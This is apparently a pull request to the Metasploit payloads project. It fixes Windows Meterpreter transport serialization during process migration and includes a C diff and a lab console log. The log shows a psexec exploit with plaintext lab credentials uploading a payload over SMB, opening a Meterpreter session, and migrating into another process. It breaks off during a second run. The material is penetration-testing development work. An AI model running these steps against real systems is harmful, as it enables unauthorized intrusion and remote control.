### PR TITLE
Fix Windows Meterpreter migrate config transports

### DIFF
--- a/c/meterpreter/source/metsrv/server_setup.c
+++ b/c/meterpreter/source/metsrv/server_setup.c
@@ -197,11 +197,14 @@ static BOOL create_transports(Remote* remote, Packet* packet)
 
 	while (packet_enum_tlv(packet, index, TLV_TYPE_C2, &c2Tlv) == ERROR_SUCCESS)
 	{
-		create_transport(remote, packet, &c2Tlv);
+		if (create_transport(remote, packet, &c2Tlv) == NULL)
+		{
+			return FALSE;
+		}
 		++index;
 	}
 
-	return TRUE;
+	return remote->transport != NULL;
 }
 
 static void config_create(Remote* remote, LPBYTE uuid, MetsrvConfig** config, LPDWORD size)
@@ -241,7 +244,13 @@ static void config_create(Remote* remote, LPBYTE uuid, MetsrvConfig** config, LP
 			dprintf("[CONFIG] Comms handle set to %p", commsHandle);
 		}
 		dprintf("[METSRV] - config_create -- adding transport");
-		t->write_config(t, configPacket);
+		Packet* c2Packet = packet_create_group();
+		if (!c2Packet)
+		{
+			break;
+		}
+		t->write_config(t, c2Packet);
+		packet_add_group(configPacket, TLV_TYPE_C2, c2Packet);
 
 		t = t->next_transport;
 	} while (t != current);


### PR DESCRIPTION
## Description

This fixes Windows Meterpreter migration when migrating into an explicit PID from the 6.5 branch.

During migration, metsrv serializes the current transport configuration into a packet that is consumed by the newly injected Meterpreter instance. The 6.5 branch was writing transport TLVs directly into the top-level config packet instead of wrapping each transport in a TLV_TYPE_C2 group. The new metsrv instance reconstructs transports by enumerating top-level TLV_TYPE_C2 groups, so no transport was created after migration and the migrated session died.

This change mirrors the transport-list serialization pattern used elsewhere by writing each transport config into a group packet and adding that group as TLV_TYPE_C2. It also fails transport setup if no transport can be created, avoiding continuation with a null transport.

  Related Issue: N/A

  ## Breaking Changes

  None

  ## Reviewer Notes

  The key change is in c/meterpreter/source/metsrv/server_setup.c.

  config_create now serializes each transport into its own grouped C2 packet before adding it to the migration config. create_transports now treats failed transport creation, or a final null transport list, as setup failure.

  ## Verification Steps

- [ ] Build the binaries
 - [ ] Open a Meterpreter session
 - [ ] Run `ps` to list processes
 - [ ] Migrate into one, see it succeed

  ## Test Evidence

<details>
<summary>Testing Output</summary>

You can see I symlink x64 bins for testing. The first run allows me to migrate successfully. After that I remove the test bins, run the migrate test again and see it fail.

```
  : msf-migrate-6.5:(no19:05:11 fedora msf-migrate-6.5 lns ~/Projects/metasploit-payloads/c/meterpreter/output/* data/meterpreter 
dump_sam.x64.dll                  -> data/meterpreter/dump_sam.x64.dll
elevator.x64.dll                  -> data/meterpreter/elevator.x64.dll
ext_server_bofloader.x64.dll      -> data/meterpreter/ext_server_bofloader.x64.dll
ext_server_espia.x64.dll          -> data/meterpreter/ext_server_espia.x64.dll
ext_server_extapi.x64.dll         -> data/meterpreter/ext_server_extapi.x64.dll
ext_server_incognito.x64.dll      -> data/meterpreter/ext_server_incognito.x64.dll
ext_server_kiwi.x64.dll           -> data/meterpreter/ext_server_kiwi.x64.dll
ext_server_lanattacks.x64.dll     -> data/meterpreter/ext_server_lanattacks.x64.dll
ext_server_peinjector.x64.dll     -> data/meterpreter/ext_server_peinjector.x64.dll
ext_server_powershell.x64.dll     -> data/meterpreter/ext_server_powershell.x64.dll
ext_server_priv.x64.dll           -> data/meterpreter/ext_server_priv.x64.dll
ext_server_python.x64.dll         -> data/meterpreter/ext_server_python.x64.dll
ext_server_stdapi_audio.x64.dll   -> data/meterpreter/ext_server_stdapi_audio.x64.dll
ext_server_stdapi_fs.x64.dll      -> data/meterpreter/ext_server_stdapi_fs.x64.dll
ext_server_stdapi_net.x64.dll     -> data/meterpreter/ext_server_stdapi_net.x64.dll
ext_server_stdapi_railgun.x64.dll -> data/meterpreter/ext_server_stdapi_railgun.x64.dll
ext_server_stdapi_sys.x64.dll     -> data/meterpreter/ext_server_stdapi_sys.x64.dll
ext_server_stdapi_ui.x64.dll      -> data/meterpreter/ext_server_stdapi_ui.x64.dll
ext_server_stdapi_webcam.x64.dll  -> data/meterpreter/ext_server_stdapi_webcam.x64.dll
ext_server_stdapi.x64.dll         -> data/meterpreter/ext_server_stdapi.x64.dll
ext_server_unhook.x64.dll         -> data/meterpreter/ext_server_unhook.x64.dll
ext_server_winpmem.x64.dll        -> data/meterpreter/ext_server_winpmem.x64.dll
metsrv.x64.dll                    -> data/meterpreter/metsrv.x64.dll
screenshot.x64.dll                -> data/meterpreter/screenshot.x64.dll
  : msf-migrate-6.5:(no19:06:56 fedora msf-migrate-6.5 ./msfconsole 
Metasploit tip: Open an interactive Ruby terminal with irb
[*] Using configured payload windows/x64/meterpreter/bind_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
                                                  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::##############                              :::::::::::::::::::
############################  ##############################  :::::::::::::::::
#########################  ######???????????????????????######  :::::::::::::::
=========================  ####??????????()????()?????????####  :::::::::::::::
=========================  ##????()??????????????    ()?????##  ::::    :::::::
------------=============  ##??????????????????  ;;;;  ?????##  ::  ;;;;  :::::
-------------------------  ##??????????()??????  ;;;;;;?????##    ;;;;;;  :::::
-------------------------  ##??????????????????  ;;;;;;         ;;;;;;;;  :::::
++++++++++++-------------  ##??????????????????  ;;;;;;;;;;;;;;;;;;;;;;;  :::::
+++++++++++++++++++++++++  ##????????????()??  ;;;;;;;;;;;;;;;;;;;;;;;;;;;  :::
+++++++++++++++++++++++++  ##??()????????????  ;;;;;;@@  ;;;;;;;;@@  ;;;;;  :::
%%%%%%%%%%%%%++++    ;;;;  ##????????????????  ;;;;;;    ;;;  ;;;    ;;;;;  :::
%%%%%%%%%%%%%%%%%;;;;;;;;  ####??????()??????  ;;[];;;;;;;;;;;;;;;;;;;;;[]  :::
$$$$$$$$$$$$$%%  ;; %%%%%  ######?????????????  ;;;;;;              ;;;;  :::::
$$$$$$$$$$$$$$$$$  $$$$$$    ###################  ;;;;;;;;;;;;;;;;;;;;  :::::::
$$$$$$$$$$$$$$$$$$$$$$$  ;;;;                                       :::::::::::
:::::::::::::$$$$$$$$$$  ;;;;  ::  ;;  ::::::::::::  ;;  ::  ;;;;  ::::::::::::
:::::::::::::::::::::::      ::::::    :::::::::::::     ::::      ::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::NN::::NN::YY::::YY:::AAAAAA:::NN::::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN::::YYYY::::AAAAAAAA::NN::NNNN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN:::::YY:::::AA::::AA::NN::NNNN:::::::::::::::::::::::::
::::::::::::::::NN::::NN:::::YY:::::AA::::AA::NN::::NN:::!!::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::YOU HAVE DONE THE NYAN FOR 31337 SECONDS!:::::::::::::::::::::


       =[ metasploit v6.4.143-dev-e13e9204be                    ]
+ -- --=[ 2,680 exploits - 1,354 auxiliary - 2,156 payloads     ]
+ -- --=[ 452 post - 49 encoders - 14 nops - 12 evasion         ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/dump_sam.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/elevator.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_bofloader.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_espia.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_extapi.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_incognito.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_kiwi.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_lanattacks.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_peinjector.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_powershell.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_priv.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_python.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi_audio.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi_fs.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi_net.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi_railgun.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi_sys.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi_ui.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi_webcam.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_unhook.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_winpmem.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/screenshot.x64.dll is being used
[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 45 modules:
    15 auxiliary modules
    13 exploit modules
    17 post modules
msf exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     8081             yes       The listen port
   RHOST     192.168.159.10   no        The target address


Exploit target:

   Id  Name
   --  ----
   2   Native upload



View the full module info with the info, or info -d command.

msf exploit(windows/smb/psexec) > exploit
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[!] 192.168.159.10:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.159.10:445 - Uploading payload... itgDmVsq.exe
[*] 192.168.159.10:445 - Created \itgDmVsq.exe...
[+] 192.168.159.10:445 - Service started successfully...
[*] 192.168.159.10:445 - Deleting \itgDmVsq.exe...
[*] Started bind TCP handler against 192.168.159.10:8081
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/metsrv.x64.dll is being used
[*] Sending stage (323775 bytes) to 192.168.159.10
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_priv.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.159.128:46541 -> 192.168.159.10:8081) at 2026-07-13 19:07:14 -0400

meterpreter > ps aux
Filtering on 'aux'
No matching processes were found.
meterpreter > ps

Process List
============

 PID   PPID  Name                                                                          Arch  Session  User                          Path
 ---   ----  ----                                                                          ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                                                                        x64   0
 68    684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 84    684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 104   4     Registry                                                                      x64   0
 196   4916  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 324   4     smss.exe                                                                      x64   0
 364   1092  child-process-rb-windows-x---meterpreter-reverse-tcp20260713-1092-81co78.exe  x64   0        MSFLAB\smcintyre              C:\Users\smcintyre\AppData\Local\Temp\child-process-rb-windows-x---meterpreter-reverse-tcp20260713-1092-81co78.exe
 436   428   csrss.exe                                                                     x64   0
 532   640   LogonUI.exe                                                                   x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 540   428   wininit.exe                                                                   x64   0
 548   532   csrss.exe                                                                     x64   1
 640   532   winlogon.exe                                                                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 684   540   services.exe                                                                  x64   0
 704   540   lsass.exe                                                                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 724   684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 836   640   dwm.exe                                                                       x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
 916   684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 936   684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 976   684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1040  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1048  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1056  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1064  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1092  3300  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 1116  1596  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 1136  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1148  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1156  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1168  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1200  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1236  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1348  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1412  3132  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 1428  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1440  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1472  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1480  5244  conhost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1556  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1564  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1572  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1580  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1596  196   powershell.exe                                                                x64   0        MSFLAB\smcintyre              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 1632  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1684  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1692  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1792  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1856  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1960  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1984  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1996  1748  conhost.exe                                                                   x64   0        MSFLAB\smcintyre              C:\Windows\System32\conhost.exe
 2008  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2060  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2108  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2196  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2268  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2324  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2400  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2764  684   spoolsv.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 2840  684   certsrv.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\certsrv.exe
 2856  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2864  4372  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 2880  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2948  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3080  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 3088  684   Microsoft.ActiveDirectory.WebServices.exe                                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 3096  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3132  5716  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 3136  684   dfsrs.exe                                                                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 3144  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3172  684   dns.exe                                                                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 3260  684   inetinfo.exe                                                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\inetsrv\inetinfo.exe
 3268  684   ismserv.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 3288  684   MpDefenderCoreService.exe                                                     x64   0
 3300  3524  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 3324  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 3348  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3372  684   sqlwriter.exe                                                                 x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
 3380  684   VGAuthService.exe                                                             x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 3412  684   vmtoolsd.exe                                                                  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3420  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3428  684   vm3dservice.exe                                                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vm3dservice.exe
 3436  684   sshd.exe                                                                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\OpenSSH\sshd.exe
 3452  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 3464  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3480  684   MsMpEng.exe                                                                   x64   0
 3500  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3524  1116  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 3604  684   dfssvc.exe                                                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 3800  3428  vm3dservice.exe                                                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\vm3dservice.exe
 3888  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 4052  6132  rundll32.exe                                                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\rundll32.exe
 4236  1092  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 4372  4236  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 4476  684   vds.exe                                                                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 4496  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 4608  1116  conhost.exe                                                                   x64   0        MSFLAB\smcintyre              C:\Windows\System32\conhost.exe
 4708  936   WmiPrvSE.exe                                                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 4776  684   dllhost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 4896  684   msdtc.exe                                                                     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 4916  5244  sshd.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Windows\System32\OpenSSH\sshd.exe
 5044  936   dllhost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 5244  3436  sshd.exe                                                                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\OpenSSH\sshd.exe
 5368  640   fontdrvhost.exe                                                               x64   1        Font Driver Host\UMFD-1       C:\Windows\System32\fontdrvhost.exe
 5376  540   fontdrvhost.exe                                                               x64   0        Font Driver Host\UMFD-0       C:\Windows\System32\fontdrvhost.exe
 6052  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 6104  684   sqlceip.exe                                                                   x64   0        NT SERVICE\SQLTELEMETRY       C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlceip.exe
 6116  684   sqlservr.exe                                                                  x64   0        NT SERVICE\MSSQLSERVER        C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

meterpreter > migrate 3452
[*] Migrating from 4052 to 3452...
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_priv.x64.dll is being used
WARNING: Local file /tmp/msf-migrate-6.5/data/meterpreter/ext_server_stdapi.x64.dll is being used
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 3452
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > exit
  : msf-migrate-6.5:(no19:07:35 fedora msf-migrate-6.5 rm data/meterpreter/*.dll
  : msf-migrate-6.5:(no19:07:41 fedora msf-migrate-6.5 ./msfconsole 
Metasploit tip: Use sessions -1 to interact with the last opened session
[*] Using configured payload windows/x64/meterpreter/bind_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
                                                  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::##############                              :::::::::::::::::::
############################  ##############################  :::::::::::::::::
#########################  ######???????????????????????######  :::::::::::::::
=========================  ####??????????()????()?????????####  :::::::::::::::
=========================  ##????()??????????????    ()?????##  ::::    :::::::
------------=============  ##??????????????????  ;;;;  ?????##  ::  ;;;;  :::::
-------------------------  ##??????????()??????  ;;;;;;?????##    ;;;;;;  :::::
-------------------------  ##??????????????????  ;;;;;;         ;;;;;;;;  :::::
++++++++++++-------------  ##??????????????????  ;;;;;;;;;;;;;;;;;;;;;;;  :::::
+++++++++++++++++++++++++  ##????????????()??  ;;;;;;;;;;;;;;;;;;;;;;;;;;;  :::
+++++++++++++++++++++++++  ##??()????????????  ;;;;;;@@  ;;;;;;;;@@  ;;;;;  :::
%%%%%%%%%%%%%++++    ;;;;  ##????????????????  ;;;;;;    ;;;  ;;;    ;;;;;  :::
%%%%%%%%%%%%%%%%%;;;;;;;;  ####??????()??????  ;;[];;;;;;;;;;;;;;;;;;;;;[]  :::
$$$$$$$$$$$$$%%  ;; %%%%%  ######?????????????  ;;;;;;              ;;;;  :::::
$$$$$$$$$$$$$$$$$  $$$$$$    ###################  ;;;;;;;;;;;;;;;;;;;;  :::::::
$$$$$$$$$$$$$$$$$$$$$$$  ;;;;                                       :::::::::::
:::::::::::::$$$$$$$$$$  ;;;;  ::  ;;  ::::::::::::  ;;  ::  ;;;;  ::::::::::::
:::::::::::::::::::::::      ::::::    :::::::::::::     ::::      ::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::NN::::NN::YY::::YY:::AAAAAA:::NN::::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN::::YYYY::::AAAAAAAA::NN::NNNN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN:::::YY:::::AA::::AA::NN::NNNN:::::::::::::::::::::::::
::::::::::::::::NN::::NN:::::YY:::::AA::::AA::NN::::NN:::!!::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::YOU HAVE DONE THE NYAN FOR 31337 SECONDS!:::::::::::::::::::::


       =[ metasploit v6.4.143-dev-e13e9204be                    ]
+ -- --=[ 2,680 exploits - 1,354 auxiliary - 2,156 payloads     ]
+ -- --=[ 452 post - 49 encoders - 14 nops - 12 evasion         ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 45 modules:
    15 auxiliary modules
    13 exploit modules
    17 post modules
msf exploit(windows/smb/psexec) > run
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[!] 192.168.159.10:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.159.10:445 - Uploading payload... HYFGztfJ.exe
[*] 192.168.159.10:445 - Created \HYFGztfJ.exe...
[+] 192.168.159.10:445 - Service started successfully...
